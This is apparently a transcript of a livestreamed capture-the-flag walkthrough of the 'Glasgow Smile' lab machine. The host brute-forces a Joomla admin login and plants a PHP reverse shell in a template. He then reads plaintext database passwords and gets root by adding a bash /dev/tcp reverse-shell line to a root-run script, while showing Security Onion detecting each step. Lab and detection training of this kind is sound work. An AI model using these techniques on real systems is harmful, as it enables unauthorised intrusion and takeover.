Alright, welcome to IT Security Labs, and in today's video we have a good one. We're continuing our learning and we'll be completing a machine from Bound, and this is for those people who are interested in ethical hacking. So if you're interested in learning ethical hacking, this is definitely something that you're going to really enjoy. So as you can see here, we have our security onion which is running, and we'll also have our vulnerable machine in the lab. It's called GLASGOW Smile. This machine can be downloaded for free from Bound, and if you download it from Bound, then you're going to need to import it in VMware, and in this case I imported it in here. Note what the IP address is for the machine. Then after you know what the IP address is of the machine, we can just start the attack. As you can see, we do it a little different here on IT Security Labs. Not only do we complete these machines, but we also capture the attack traffic. So if you're someone who wants to learn blue teaming, this is really good stuff for you, because you learn how to attack things, then you learn how to detect them, and I think you become a better person in InfoSec when you know how the traffic is generated and how it's detected, regardless of which side you are on. And I am on the journey of becoming hopefully good at this stuff, mostly detection and also attacking. So that's why I'm doing this. And I'm also in the process of going for the OSCP, and I've done most of these machines, and today we are on this one right here. A few days ago we did Healthcare 1, which was a super fun machine, and today we're going to continue the same skills that we learned from there on GLASGOW 1.1, which I think you're going to enjoy. Alright, so once you download the machine and everything is ready, the next thing that we just need to do is get our Kali Linux and then start the attack. So let's go to Kali. Mine is running in VMware Fusion, and this is Kali undercover mode 2019.1. So okay, so my machine, my victim machine here in the lab is running in ESXi, and let's see if I can see what the IP address is. So if I go to console in a new tab. Hello Matthew, it's good to see you, man. Thanks for joining. I passed the Certified Ethical Hacker exam a few days ago. The multiple choice one, it was super easy. I passed it in 90 minutes. I'm going for the Certified Ethical Hacker practical in 2 weeks, and then I'll go for the Certified Licensed Penetration Tester from EC Council, hopefully soon, and then the OSCP. So that's my path. Our IP address is 192.168.38.21, so let's go and see what we can find. Let's ping it, 192.168.38.21. Make sure the machine is responding before we start doing anything. Alright, so now that our machine is up, let's run our Nmap here. Today I'm going to do an aggressive scan, 68.38.21, because I really don't care about the detection engine here. In fact, I want to be detected. So I'm not going to try to be stealth or do any ping scans or something like that. If you're brand new to ethical hacking, Nmap is going to find out what's running, services that are running on my victim machine. Usually I do a service scan and also a service version, but the aggressive scan does pretty much the same work. So our attack surface is very small. We have port 22, port 80. Yeah, interesting. Two things that come to mind when I see a smaller attack surface is it's either going to be super easy or it's going to be difficult. Okay, so with port 80 open, let's go and check out the site that's running there. Let's find out what's running. It's GLASGOW Smile, and we have the Joker here. Interesting. All right, so let's do what we normally do with port 80. When port 80 is open, I've so far, after attacking so many machines, come up with my own sort of workflow. Port 80 is open. I'll send my friend GoBuster, and this time you'll see that I'm just going to run with this directory here, big.txt. It's very thorough. So I'll show you what it looks like when we use big.text. Let's go back here. So go buster, we're saying, hey, bust some directories. We're going to brute force the site for directories. And obviously this is going to be very loud. 192.168.38.21. So this is brute forcing some directories, and this is going to get caught. So let's go back and check. While it's brute forcing, let's check our security onion here. All right, I'm just refreshing to make sure that I'm getting the latest stuff. Let's change this to the last 2 hours, so remove a bunch of noise. All right, first thing that you're going to notice here in Security Onion is these are alerts, mostly Suricata events. This is the severity right here. And as you can see, we did catch a bunch of things, including scans from Nmap, which is fine, we got caught. Our brute forcing is also getting caught here. Let's look at it in Kibana, which is easier to look at least for me. I like Kibana better. So if you're just joining us, we are attacking a machine from VownHub called GLASGOW, and my goal is to learn ethical hacking so I can become good at the OSCP and also sharpen my skills. And I hope you guys can learn as I go through these things with me. So if we go to the alerts in Kibana, we're going to look at the Nmap scan that we just did on our victim machine, and also we're busting subdirectories right now with the GoBuster, pretty much brute forcing on the site. We're making a lot of noise and we don't care about getting caught. So let's see what this turned into. All right, so as you can see here, now this looks better. I can see that Nmap scan was detected. We've looked at that before. We see that there's some suspicious Python here. My GoBuster from the browser doesn't get caught. The GoBuster from the app tends to get caught. I don't know why, but I've observed that if I run from the terminal with GoBuster, somehow it doesn't get caught. If I run from the application, the user agent and everything gets caught. So we're busting some directories, and we have Joomla. Joomla is a website platform just like WordPress. So we have a /Joomla with a 301. So let's go check it out. We're enumerating here. Is that how you spell Joomla? You want to make sure you get your spellings right. Otherwise, you won't see anything. All right, so it looks like we have some text here about comedy and messages from the Joker and the reference to Gotham City. There's a reason why all this stuff is here. So if this was in the real world, right, you have a target, you want to find out as much information about your target as possible. Most companies have websites, so this is where you'll be looking at the website. Do they have an employee directory? Are there any vulnerabilities? In this case, this looks like our way in. We just need to find a way to crack this machine using this website. And since it's Joomla, I need to find out what version of Joomla am I running. That will help me a lot to see if there's any vulnerabilities. I have a login page here, the username and password. So I can try SQL injections here. In fact, I tried SQL injections here with admin or admin, something like this, just to see if this will work. See if this thing is vulnerable to SQL or not. No, nothing there. Thank you for subscribing. I appreciate those who are subscribing. Thank you. Okay, so we can try to brute force here, but since we have Joomla and we have a name here, Joomla is like WordPress. So what I like to do is I like to come here. Let's open Google. Let's make our life easier. What's known about Joomla, right? We have a bunch of vulnerabilities. Problem is we don't know the version of Joomla, so this won't help me much. But did someone tell me how to enumerate? I need to find out, how do I enumerate Joomla? If I can spell Joomla, I don't think that's how you spell Joomla, but all right. So as you can see from the results, actually I can see Joomla WP scan. or Joomla Scan. That's what it's called. And here's a nice article. I'm just finding this from Google. So you have everything. If you know what to look for, you just do that. So as you can see, they explain how you can find things by using enumerating users if you knew the users. Right, so let's do a Joomla scan. And I'll show you how to enumerate Joomla using Joomla scan. It's just like WP scan for WordPress, but this one is for Joomla, so nothing special here really. Let's cancel this because I know there's nothing there. Let's clear the screen. So I already have Joomla scan, and I'll show you where I got this from. It's all on the internet, right? So from GitHub here, here's the Joomla scan repository. I just ran this, and as you can see, it tells you how to use it, right? Once you git clone cd to Joomla scan, which is where I am, perl Joomla scan pl, that's the usage, and then we need to specify the URL and all the good stuff. So let's use one of these and put our URL. This is the usage for it. I'm in Joomla scan, so I should have a Joomla scan.pl. So let's run that. But instead of www.example.com, I have 192.168.38.21. Usually what I do is I add this to the Etsy host if I knew the machine name. I don't know the machine name, so I'm just going to use the IP address for now. But usually I will add this to the Etsy host so I can use at least some DNS stuff. So let's see if Joomla scan finds anything. Alright, so according to Joomla scan, we have admin page. Let's go check it out. Come on. Now, this is becoming juicy now. This is worth spending time on. SQL injection, simple test. Alright. I don't know. You can try SQL injection here, but the first thing that I do when I run into some weird applications is I go to Google. What is the default username and password? I don't want to waste too much time without even figuring out what the default username and password is. Someone asked you for it on the forums. You always want to try that before you start running any tools here. I think it's Joomla. The default username is admin. There's no password. You have to set it up in the last step in the installation. Okay, so we're screwed. You come here and you say admin. We don't know the password. Log in. Nothing. All right. So I got stuck here for a long time. I tried SQL injections using burp suite interception. Didn't work. No luck with SQL injection here. So what I ended up doing is, remember this thing here, and I think this is why this machine is great for those who want to learn the OSCP, was if you get stuck, you need to think, wait a second, what else do I have that can help me? We have all this text here. We have pretty much a site, right? Let's create a word list here and then brute force this thing. Let's create a word list from what we're given. They're mentioning a city, Gotham City, and all that stuff, and another one here, whatever these names are. What if this is one of the passwords? So how do we create a word list from here and then use it to brute force on this site? And I think that's something that is really worth learning here. To generate a word list, we use a tool called Sew. Oh my God, SEWL. Let me see if I have it here. Create a word list from a site. All right, there we go. That's my cheat sheet. I probably did this when I was working on hack the box. So let's create a word list from our website and then see if we can brute force. Let's clear that. All right, first of all, our site is on 192.168.38.21/Joomla. And yeah, that's what we want here. Let's just do that. So this is a tool that will go to the site, grab all the words that are there. You can specify different options here, right? For example, the length of the words that you're going for. So if you know a company's password policy, maybe you can say, give me all the words that are 8 characters long, and go this many levels deep in the site and all that stuff. That's what you can do with this tool here. And in this case, I just want to go to the actual site. And this one, I'm going to name it Pass1. Let's see if it works. All right, it worked. Well, I've seen this so many times. You get this error, it doesn't matter. Let's cat Pass1 to text. We got a bunch of words from our site. And our security onion should have caught this attack actually of us doing this. And as you can see, we have a bunch of words. It would also be fitting for us to add the word Joomla in here, since it's a Joomla site, or any other interesting words. Let's see, what am I missing here? I'm looking for my file. Okay. Right, so now that we have Pass1, how do we use Pass1.text to brute force Joomla? Meaning the admin site here. And here is where things get interesting. And I think I find this super exciting. From the first day that I learned this trick using burp, it's almost always. So what we can do is we can put bogus username and bogus password, then brute force both of these fields using the words that we generated. We can do that. But to save us time, I found out that Joomla is the username, but I'm going to say we still don't know the password. If you didn't know that Joomla is the username, just make sure that Joomla is in this file and brute force both of those. It will find it. It's just going to be longer. But let's turn interception on here. Hi BT, it's good to see you, man. Right, with interception on, let's say test Joomla and test. If we try to log in, no. Someone is probably saying, where's your Foxy proxy? Let's enable our proxy in here. And now that our proxy is on, let's do it again. Joomla and test. And let's intercept this request in burp. And in here, let's send it to intruder. And we've done this with SQL injections. We can do it again, brute forcing this Joomla site. Right, here, we want to go to the payloads and let's paste all those words that we have. Right, remember, I put them in pass.text. I also have another one. It's the same, it's literally the same. It's called words.text. It's the same words that are in pass.text. I'm only using this because I rearranged this so that it's faster. So let's copy this. And let's paste it in here. Usually when I'm doing these brute forces, I also go to the options and all the way down here and say follow redirections, just in case we sign in and you get redirected somewhere. You always want to do always. I'm not going to do that this time, but you always want to follow the redirections. Let's start the attack. And what this is doing is it's trying all these different words in the password field here automatically using burp. And it's showing me the length. We're keeping track of the length here. If the length changes, that shows that maybe we've hit a password, then we'll find out. So that's what we're doing here. As you can see, we have 352. If you were brute forcing both the username field and the password field, this will be 352, but you have multiple permutations and combinations. So you might want to start it and then forget about this for maybe an hour or two and come back and check it out. But for now, this is what we have, and let's leave it running. Let's check our security onion. We have done a few things here that should have caused us some noise in here. So let's check this to the last 1 hour. We only want to see relevant traffic now. All right, so as you can see, we have a spike here and we have another spike again. So we have some spikes. That shows that our attacks are actually working. And as you can see here, Surikata caught password policy in clear text. This is us brute forcing right now. You see we have 65 times. That's us brute forcing using burp suite. And let's open this. Let's just filter by this value and I'll show you if we can see the passwords that we are trying. So if you're a good guy, a defender, you should be able now to see what just happened here. So let's see if I can filter this again. So right now I'm writing a lot of data to my database and I'm trying to filter, but this shouldn't be too much. All right, so here's our source IP address. That's my Kali Linux. This is my destination. That's my victim machine, 192.168.121. And I hope I filtered it here. All right, so let's check out this first one. Is this the data where I'm trying? Yep, you see it's a post to the administrator. And let's look at this. Bam, right there. This is us trying to brute force using burp suite. So if you were doing incident response, you know exactly what the person has tried. They're trying to use a Joomla and password test in this case, and this is the request that they made. Super simple to intercept, and in this case, since it's an HTTP site, we're able to see it right away. Let's go and see if we have a hit on our attack. So let's keep an eye on this length here and scroll down. Oh, I see it changed. Interesting. Right, so we got a change from this 5,000 here to you, Joker, and that one, and it changed again. So this is where it becomes interesting, right? Let's see. I was expecting one of these to have changed, so you might get yourself stuck here. Okay, so let's see. I have a bunch of 399s. How many are they? From here to here, then it starts again, and it's still going. All right, let me do something different here. Let me stop this. Okay, let me check my request again. Let's forward this one. Reception off. I'm just going to do this faster. Because it didn't find my password the way it did when I was doing the test earlier. Okay, so let's forward this to Intruder. In Intruder here, we got payloads. Our positions first. Let's clear the position. Position that we want is the test. You want to make sure you choose this correctly and add that. I think that's what I didn't do right last time. All right, so we choose the position for test. Payloads, let's go back here and copy that and paste them. And now let's start the attack. So you get to see it twice. If you missed it, this is how you do the attack, and as you can see, it's going. This is all getting caught, and now it's working properly. So right away we see 5623, and then it changed right away to Gotham and Funny, and this is what I was expecting. So my parameter for the position was just not right. I had highlighted the and field, which shouldn't have. That's why it didn't work. So if you see weird behavior, that's what you should be doing. Right, so now that we've seen some results here, let's see. Gotham is the password. You can try this one and the next one, which is 399. If there's a bunch that are similar, most likely they're not the password. So you try Gotham and you also try Funny, but Gotham here is going to do it for us. So let's move on. Interception off. Okay. Resend. Come on. Joomla and Gotham. Alright, so we're in. This reminds me of the application that we attacked last time in our last live stream. It was a healthcare CRM. And the way these things work is, the moment I get in here, before I know anything, I want to find out, do I have a version? I have a version, Joomla 3.9.23. Now that is helpful. You know what I'm about to do? Google. You can use sexploit in Kali and see if you can see any vulnerabilities that are already known by ExploitDB. But Google is good. 3.923, there's a security bug in fix. This doesn't look exciting. I was expecting a bunch of ExploitDB stuff, and they fixed it. And the priority is saying low here. This is looking terrible for me as an attacker because my results from Google are not promising. But hey, not a problem. Maybe in here we have something. Multiple vulnerabilities according to Nessus. And usually when I look at these results, I'm looking for something like remote code execution. Something juicy like that is what would be interesting. But I'm not getting excited about these results from Google. So time to familiarize ourselves with this thing. What's in Joomla? What can I see? What can an administrator manipulate? Last time with the healthcare CRM thing, we found out that we can change a PHP file. We also did that with WordPress, index.php or 41.php. Same deal here. That's what we're doing. You're looking for any files that you can write to that can execute PHP code. And it takes a long time, right? You need to understand where is everything. With media, what kind of media are we talking about? We have PNGs, we have banners, we have headers. And as an admin, I should be able to put things in here. I can create a new folder. Great. We can add a folder. Where can we access this? Let's go to the headers folder. These are JPEGs. Does it do it for me? I'm looking in here to see where are these things located. How do I trigger them? All right, so that doesn't seem interesting. Add a new article. What kind of articles can we add? And no one said hacking is easy, right? You need to really get yourself interested in here. Or if you wanted to, you can go and say, hey, wait, what are the common files that I can put in Joomla? I can put an article here. What format do we save it as? I want something that can be executed. And there's publishing, interesting stuff. All right. And it also has the option equals to, but since we already signed in here, I'm not too worried about that. Let's cancel that. Configuration. Now that's where administrators spend their time. We're most likely going to have privileges here. Templates. There we go. We're getting somewhere. I see index.php here. Or any of these. Now we are talking. Right. We hit our jackpot. Let's remove this and replace it with our nice PHP. Our PHP shell that is kind. Remember, my PHP shell is right here. This is from if you've been watching my channel, now you know that I do this all the time. This is from Pentest Monkey, and this one has my stuff already set, and in this case it's put 8888. So let's put this one in there instead. Let's give them a present, and hopefully we can get back with our PHP. So the biggest takeaway from what I just did here is, if you get access to one of these applications, you need to spend some time in there and see what you can do as an administrator. So maybe I could have saved us time by going to the admin place and seeing the templates. And this template section here reminds me of what we can do with WordPress. Paste. Because this is what we did with WordPress for one page. Right, so now let's go and make sure it's port 888, and this is the IP address of my Kali Linux, and that's the only thing you need to change in this PHP reverse shell. If you haven't used it, it's by Pentest Monkey. Just type in Google Pentest Monkey reverse shell. Very common one. You use it a lot. So now that we have it in here, where's the save button? Save and close. But how do I trigger this thing? All right, the file has been saved. Let's go and start a listener and figure out how to trigger that. To start a listener, netcat -lv-np. This session that I'll get right now also gets caught by Security Onion. 1, 2, 3, 4. That's the port that I want to listen on. Okay, so how do I access this index.php? Is it as simple as just this? Where is that index.php located? Let's see. I don't think so. So what I need to educate myself is those templates, or I can just do the easy and lazy way and say, oh, it has to be somewhere, right? It's a Joomla index.php. Is it this one? No. Now I need to trigger my index.php that I just messed with. All right, let's go back here. Oh, it was in a templates folder. It was in the templates folder. Let's see. Okay, this is named something like this, and here they are, the different templates. Right, I need to figure out how to trigger these templates. That's all I need to do. Where does it live, and what is the full path to it? Where is the configuration for it? Let's see. So there's the information. Oh, here's the document, the big button that says documentation. It would be nice if I could read documentation, right? I want to take a shortcut. Let's see the error.php. Maybe if I read the first one before I removed it, I will know where it is. So let's see. Where is? Let me look it up. I don't want to waste too much time here. Where is the Joomla PHP file? Or do I just need to? Oh, I'm not being smart. I don't even need to access it through the browser. Here's the index.php. Last time, remember, with our CRM, we didn't even need to exit. We just needed to access that from the admin interface. That's what we need to do it here. I'm not. So, template preview would trigger the template. Of course, I have my PHP in there. So now I got it. So I didn't need to access it through the browser. And this is the second time this has caught me. If you attended our live stream last time with that healthcare CRM thing, we also didn't need to exit. We just needed to preview the template by triggering it. So we're in. And as you can see, we are www data and the group is www data. So that's not helping. Even though it's www data also needs, we just need to make sure that this is stable. And this is how we fix the shell. All right. What do I have here? www data. Interesting. Environment variable is not set. I should just do this automatically. Alright, I like to get comfortable in here because just in case I'm in here for a long time, I want a shell that works, so now it works. So as you can see, I don't have much going on here. Home is not set. Nice. So in the home directory, by just moving around, I found some users. Abner, Penguin, and Rob. Can I get in there? Oh, I can. Interesting. Here's a user 2.txt, I guess. Okay, great. Now we know there's a user 2.txt that I need to read. I just don't have permission to it now. So we need permission to get there. Can I read somebody else's then? Someone who hides behind a mask? Is that a directory? Is that a... I can't. All right, great. But we know there's interesting goodies on these people's directory. Now we need to go there and figure out what they have. Now, last one, Rob. Okay, so this person needs your help and how to be root. Okay, I bet I cannot read this as well. Okay, I'm getting trolled, but I know there's goodies here. Okay, what do we do here? So there's a few things that you can do, right? You can bring enum, lean enum here, and lean enum will do all the work for you. You do enumerate the services that are running, find SUIDs, files that are running with SUIDs and all the good stuff. We can do that, but in this case it doesn't seem like it's working, so we need to go somewhere else. Since we're in as www data, the one place that www data always has access to is at least the configurations for the sites that comes with whatever systems we abused. And really, cd, oh, come on. You gotta be kidding me. I'm just going to exit here and come back, and you see why I'm doing that in a second here. Okay, so this is where it dropped me. Where does Joomla keep its configuration files? That might help me. And this is what I learned from working with WordPress, is that when I get in as www data, with WordPress I can see WP configuration files. Let's do that for Joomla and see if it works. I thought it would just drop me back into www in the Joomla configuration file. That's why I exited. No, it didn't. So I need to find out where Joomla configuration files are. cd search var lib /www. Wait a second. No, it's not lib. Search var /www. There it is. So I have HTML and I have Joomla 2. So here is where we're just going to see if we can find different things. We have Joomla 2 and HTML. Let's go to HTML first, and then we check Joomla 2 in a second here. Joga.png, I think that's what's on the site. How to.text, I think that's the text that was on the site, but let's view it anyway. If you read a bunch of things about this machine on the site, it says that you need to learn how to enumerate. Hi Rob, forgive my laughter. I have a condition. Take care, Joker. Okay. How is this a how to? You can download this Joker.png and run strings or steg hide on it, but I don't think this is our thing here. Our thing is on Joomla. Right. Web.config.text. I was expecting a .com file. Okay. I'm just looking here. Usually you can automate this by just saying, hey, look for the word password in this file, or something like that. So I don't see anything of interest here. So let's yeah, that didn't look right. All right. This is what I was supposed to be looking at. This just took web.config.text. Okay, it's configuration.php. That's the one that is good. There we go. Just like what we see from WordPress and all those ridiculous sites. We got a bunch of things here. We got a user Joomla, password baby Joker. So we got users and passwords here in plain text. Admin at Joker, that's mail from. That's the good stuff. This is what at least we expect from all this stuff here. All right, so let's sign into the database here. As you can see, we have some. It's a MySQL database. The username, as you can see here, is Joomla. The password is Baby Joker. Let's try that. And here comes what we have done several times. And if you haven't seen this, this is something that you need to just have in front of you right away when you see something like this. MySQL user Joomla. So we don't have the root like we normally do with other things like WordPress. I've seen that in -p. And the password that we got, Baby Joker. And guess what? We are in. So now we just need to learn the basic MySQL commands like show databases, show tables. Then we can view what's in the databases, what's in the tables. I know some people have really cool tools that they use to automate this process. But for now, let's just do the basic. All right. We have MySQL, Performance Schema, Joomla DB, Bet Joke, and the information schema. So, of course, of all these, Joomla DB is going to show us Joomla users, hopefully. This looks interesting. Let's start with that. Ideally, you want to see all of them. Let's say use Bet Joke. And always remember to close that. Let's see if we have any tables here. Equipment and task force. That's interesting. So we can do a select all from equipment. Task force sounds like people, right? Equipment is just equipment. Task force. All right, couldn't have it any easier than this. We have a database with users. I'd like to have a tool that just automatically dumps all this stuff to a text file for me, so I don't have to go through every single one of them manually. I want to gain some speed here, but for now, this is what I have. If you know of any tools, let me know in the comments here. So we can crack all these passwords, usernames and passwords. And last time, I was lucky. Matthew and someone in the chat and George gave me a better way for me to just save this to a text file and actually just grab this last field if I wanted to. You can automate this part, but let's see. Let's save some time here so we don't spend too much time. Let's decode. Who should we start with? Rob. I think Rob is the interesting one. Ant? Okay. Let's decode Rob since he is the longest one here. So this is base 64. There's multiple ways people do decode their stuff, right? Some people decode in here. Some people decode in the terminal. That doesn't really matter. So here's the actual password for Rob, and you can do it for all of them. Oh, I have negative thoughts. 3 question marks. This is actually not a bad password. It's long. Can be brute force though. Right. So we have a password here. Let me make sure that I copy it. Command C. Let's start a new tab. Alright, so from our Nmap results, we saw that we have SSH. So let's SSH on this machine using these passwords. That's the logical thing. Once you crack these passwords, try to SSH and see if we can get in as one of these users. This way we can actually have a better experience. We're in as Rob. So I just chose the Rob, but you can just brute force crack all the other passwords and see. And now we have a nice terminal. Oh, come on. If I can't clear my screen, things are not working. Now I think I can read my cat user.txt. And if you didn't know which order to crack these passwords, remember when I was going through the www data and I was able to see these users, there was user1.txt, then there was user.txt. So it sort of makes sense that Rob is first based on what we saw there. And then there was another one that looked like a hint. So here is our first flag for this machine. Now we can read the other stuff. So we found this user earlier, and this time it says that person needs help and how to be root. I want to get that. Have you ever felt like cursing, right? No hints? Sort of like try harder, which is the motto for the OSCP. So you can tell this person went through the OSCP and they struggled with it as well, or at least they worked harder, which is what we're doing right now. We're trying harder, we're practicing, we're putting in the time, while others are watching TV and playing video games. We're putting in the time and we're getting trolled. What is this? Encryption. That's what it is. It's encryption. So from Hack the Box, I learned a few things about encryption. There was some decoders online. Nah, not this. Do we know what this cipher is? I don't even know what cipher that is. This sucks. Is it even a Caesar cipher? Oh! I swear I didn't know about what that was. I knew that it was some form of encryption and I needed to decode it, and I googled it. And it looks like it's working, guys. Look at this. Hello, dear Arthur. Suffers from the severe mental illness, but we see little sympathy for his conditions. Okay. Now I need your help. Okay, use this password. Oh, here's another base 64 that we can decode. We're familiar with this. Right, so what is the biggest takeaway here? Guess what they wanted us to learn? Some encryption. So if you know encryption, if you didn't know what this is, you'll be like scratching your head, right? I just know from completing encryption challenges on Hack the Box that if you see jumbled messes like this, you need to drop them in one of the Google decoders. And I just happened to go to the Caesar cipher, but if I didn't know that it's a Caesar cipher, which in this case is just moving things around, this looks like a Caesar cipher anyway, because it looks like they just substituted words of the alphabet. Right, so we got a base 64. Let's go and decode that again. I think it's a base 64. I hope my death makes more sense than my life. That is not nice. But I can use that. It's a capture the flag machine. Sometimes it becomes too capture the flag-ish machine, but we're supposed to have fun with this anyway. So let's let's go and SSH. I think it says Arthur. Wait a second. I need to slow down. I need to read the message properly. Oh, it's Abna, not Arthur. Okay. So let's do that. At 192.168.38.22. So this is going to be longer than it usually happens. This is a 3-user machine. Right, we're in as Abner, so we know the trick, right? Cat user 2, the text. So we found two flags now. It's just another hash, and the following the use hack the box format here is usually HTTP and this flag. I guess somebody spent some time on hack the box, which is cool. Info.txt, look at that. The creator of this machine said it involves a lot of enumeration, so this is a practice of us spending too much time looking at everything. Let's read this. Let me see if you guys can see this. Oh yeah, you can see it. So how is this supposed to give me root? This doesn't help me. Okay, let's do our usual sudo -l. If you've been watching me, you are like, hey, sudo -l. We're in deep trouble. We can't. No problem. So since we cannot do sudo -l, let's go back to our playbook. And in our last, let's see, in our last machine we learned something, right? We learned that we can enumerate. What did I do last time? I'm trying to find, not in the reverse shells. I think it was in preview. SUIDs. Let's find some SUIDs. That's what I was thinking. You want to get this out of the way. We might not find any. We might find some. This is too short. So I'm looking for any applications that might have been created by this person that are also running as root, or some. Yeah, none of these look good. This is not helping. I guess I would have to show you this. There it is. I mentioned linear num all the time. Why not just get it there? We can do this manually and try to figure out more stuff here, but hey. Now let's transfer this file over there. Oh. I can use a one-liner for SCP and get the file to my machine. Let me see if I have a one-liner in my file transfer. I don't have my one-liner for SCP in here. I need to add a one-liner SCP file transfer. But since I don't have it in here, no problem. We'll stick with Python for today. And this is how you what? Who is listening on port 8080? This is how you transfer files from your Kali Linux to the victim machine. And usually you want to go to the /tmp just in case if you are say /ww data. And this is just good practice as well, I think. 192.168.38.133 8080. It's port 8000. You gotta remember your ports or else. Alright, there is our Nmap, and this is just going to do all the work for us. But before we do that, you gotta give it some permissions, right? Boom. So this is just going to find everything for us without wasting too much time here. And this will take some time for you to go through, of course. Okay, here's some bash history that you might be interested in. I'm looking for plain text passwords in bash history, but I don't have any. What is this? .dear penguins. What are we doing with this? This is not my history, this is the person's bash history. And they were unzipping this dear penguin file. Okay, I'm going to check it out, but let's see if I have anything in reference to dear penguins. It's a hidden directory, it looks like. Wow, too much noise, I probably skipped it. But hey, this is enumeration. You need to spend some time and be patient. If you are not patient, this might really frustrate the hell out of you, and you will not last a minute doing this. You need to have some patience and also try to find ways to be efficient. I'm not super efficient at this moment. Okay. I think I passed it. The penguin's file is somewhere. The penguin's file is somewhere. Let's go find it. It's somewhere in these results. I just don't want us to be here all night, but I know the penguin's file is somewhere, and that's my way in. It's the penguin's file. Crap. Okay, let's find every file that this person has ever owned. Since they're the ones who are executing it, I think I can do this. The result is probably somewhere in there. Oh, thanks for the find command. Yeah, I told you I'm not being efficient. Oh, it's a hidden directory and I need to find it. Wait, it was probably... It was somewhere here. I know it's somewhere here. Was this person unzipped it? All right. All right. So I'm somewhere. You see, if only I could just be efficient with my stuff with grep. Thank you for the little tips. Okay, so there it is. Let's do it the way they did it. Oh, come on. Do I need to get this? What is the password? Let's try this. I think we're in business. Let's go see what we have in there, in the Joomla file. Just want to go all the way there. Okay, so we just unzipped this hidden file and it gave us this. Seriously? I haven't done this. I didn't go this far. I didn't think that would be the... That can be the... That can be the file. I think I unzipped it somewhere. If you're too experienced with this, you're probably getting frustrated because you can do this faster than me right now. I'm getting there. Come on. All right. I thought this thing succeeded last time. What happened? I think it succeeded in here. See, I'm being so dumb today. Thank you. It succeeded in here. There is another one. My dear penguins, we stand a great threshold. It's okay to be scared. Many of you won't be coming back. Looks like a speech. Blah, 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 blah. Okay. So looks like it ends again with another base 64, I think. So let's see if we can decode this one. Or is it base 64? No, it's not. Base 64 ends with this. Let's go back. What is this? Maybe I need to... This looks like some message that I was supposed to get. So let's see, what is that stuff? Oh, I see. Is it penguins? was the user? Was it penguin? Oh, penguin, not penguins. That's the password. You'd hate capture the flag machines because of this, but right now I've learned to embrace them. I'm learning more things than this capture the flag-ish stuff, so I'm cool with what they're doing here. Okay, so we're in as penguins. I think we're close to root now. Someone who hides behind a mask. I think we know who that is. What? Here's our third flag, but we need to be root. We need to be root. I can't make it to work because of a permissions issue. The software that they're running, it only runs with root permissions. We like that. When it's complete, I'll copy it to this folder. Isn't that interesting? So if you had just ran an ls, you would not have found it. The hint is that they will copy to this folder. So we are assuming it's in this folder. So now let's find out what is this application that we're talking about. Is this a directory? Is it a hidden directory, or is it? No, it's a. Now I'm getting somewhere. Remember, the message said this thing runs as root. I bet you this runs as root. So we don't have a problem with that. That would be the easiest root we have ever gotten. Let's put a reverse shell in here. Which one should we use? A one-liner would be nice. A one-liner will be awesome. I have this one, and I have two links here. Let's see if we can put one-liner from Pentest Monkey here. Crap, Pentest Monkey is blocked. Let's go here. I haven't fixed my lab. My lab still blocks Pentest Monkey because of this firewall. So the menu is pretty much open up to us, right? We have all these that we can run. These are all one-liners that we can use. Python being our favorite. Somehow, I don't know why, but my Python, I have better luck with the IPv6, even though I'm running on IPv4. So don't chastise me. It always works. A few times IPv4 failed, so I always pick this one, and it works all the time. Let's try that. Oh no! We don't want that. We don't want any trouble. I guess we might have to echo things in here, since you don't like. This thing doesn't seem to like us that much. Okay. I'm just going to echo this to the end of that line. I think we echoed something last time too. But if we get too excited, I need to change some things in this one-liner. Port 4242 is fine. This needs to be my IP address for my Kali. I think it's 133. All right. I need to echo this to my trash.old since it runs as admin. You can check this with its permissions as well. Oh crap. It put it at the end. So this is going to exit before my thing runs. I think so. Crap. I don't want it to exit. So I guess I can fix that. I can just insert mode. Did I mention that I hate nano at all costs? So that's what I'm trying to avoid here. Let's see if they've Vim. Crap. Nano it is. Wait a second. I don't even need to do. What if I just nah. This is what frustrates me. I know this is going to exit before because I shot myself in the foot. What if I had appended it right here? Crap. Alright, I'm stuck at the dumbest part. Isn't this interesting? I know that this is what I need to do. Let's see. Oh, I see. Yeah, somebody said it's missing my. Okay. You know, I'm just going to cannibalize this a little bit. My VI is not stable enough for me to edit this. And I'm not comfortable with nano. But hey, let's put nano here. Look, nano works, VI doesn't. Now I just need to know how to use nano. I've avoided nano for a long time. How do I insert in here? This is why you need to learn all of them. Alright, so I have my one-liner here, Python import, and it's not complete. If I was in VI, I know how to delete that. I'm literally looking at the nano help to see what I need to do. First of all, you know what? I can write in here. I'm just going to write bash instead. I'm not going to even fix the Python. -C. I'm getting a one-liner for bash, which is easier. Bash -I. Then I got this. I got this. I got an end. I think that works. /dev /tcp / then I need to put my IP address here. 192.168.38.133, and I need to put my port, which is what? 999. Okay, that works. 9998, and then I need to put a 0, close it, and it's also on the list that I showed you earlier. One. This one line I will come back. I intentionally avoid nano. You were saying, how have you gone so far? I mean, I know I've used it. Then I was like, no, screw this. I'm just going to go with VI and Vim. And I just like VI and Vim. And I'm one of those people whose brain just like, no, nano, I don't want. Okay, so now that I'm here, how do I save in nano? And I also use a Mac. Shift O, no, Command O, yes, I think I did it. I'm a nano user. Okay, now I need to start my listener very quickly here. I use nano now, sudo su. I can use nano if I'm put in a corner, like now. Okay, now we just need to make sure that this thing runs. How is this thing running? I didn't look it through my results. I should have seen if there is a cron job that's running this, or else I have to manually run it. Okay, looks like it manually ran. There we go. So it worked. Our one liner worked. ID is root, but all right, that was fun. That was fun and painful to watch. So give me a like, a thumbs up. Tell YouTube that this stuff is good for others by subscribing and liking. But the fun is not over yet. I know we have been here for more than an hour and 20 minutes, but let's go and see what we did with this noise. We can just do all this noise and stuff like that. The privilege escalation here was a combination of the hint and all that stuff. Not super fun. Would have still found this hidden file here with lin and num, and would have seen it without the hints. But that's what we had here. So let's keep it that way. Now let's just go and find out what did we do in our security onion. This is security onion running in my VMware environment. Let's remove that. Actually, I have it signed in somewhere. There. So let's refresh this, and I'll walk you through what we are looking at here. So we were doing this attack. We were just tinkering around. During that time, I'm intercepting the traffic, and this is what we have done. This is the damages. We committed a crime. Now we're investigating ourselves. First of all, this is the one that I showed you earlier. The password that is showing in plain text. We ran burp suite, and the password was in plain text. So this is what we have. We can go and see all the different passwords that happened, but the count is 158. Remember our word list that we were brute forcing with had about 160 something words in it. That's where we got this count. We can go and find this in Kibana by just clicking on the Kibana. It will pop up Kibana, and this lab is super easy to set up, by the way. I'm using a D-Link switch to mirror this traffic, and it's a very cheap switch. We have 2 million events in this lab. So this is why you don't want to run it on your desktop, your laptop. I mean, we generate too much noise over here. You don't want your fan going crazy on you. Just get a cheap server to do this, especially if you want to be doing it at this level where we are really capturing all kinds of data. Just get a cheap server, an old gaming desktop with a nice GPU. Alright, so 